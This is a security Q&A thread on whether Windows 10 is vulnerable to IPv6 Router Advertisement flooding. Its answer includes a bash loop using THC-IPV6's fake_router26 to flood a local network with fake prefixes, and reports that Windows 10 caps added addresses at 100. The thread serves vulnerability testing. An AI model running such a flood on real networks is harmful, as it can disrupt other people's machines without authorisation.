# Is Windows 10 Vulnerable to IPv6 Router Advertisement Flooding?

Tags: denial-of-service, windows-10

In [a DEFCON 19 video](https://www.youtube.com/watch?v=1EAnjZqXK9E#t=14m40s) Sam Bowne says that windows 7 machines CPU goes to 100% if you send a bunch of IPv6 Router Advertisement requests on a network. What would happen to a Windows 10 machine? Would it be the same, worse or would just nothing happen?

Answer (score 2):

The video is from DEFCON 19 i.e. from August 2011.

This is easy to test by starting such an attack from Kali Linux that comes with [THC-IPV6](https://tools.kali.org/information-gathering/thc-ipv6) `fake_router26`, e.g.

```
#!/bin/bash
for i in {100..999}
do
    atk6-fake_router26 -A 1:c0f:fee:$i::/64 -n 1 eth0
done
```

By monitoring the Windows 10 target machine during the attack we can clearly see the difference:

[image: CPU utilization on Windows 10 target machine]

The increase in CPU utilization is noticeable but not dramatic. However, more noteworthy is that it stops after a while despite the attack is still ongoing. That's because Windows 10 stops adding new IPv6 addresses after reaching 100 addresses (while we were trying to add 900 addresses):

[image: ipconfig]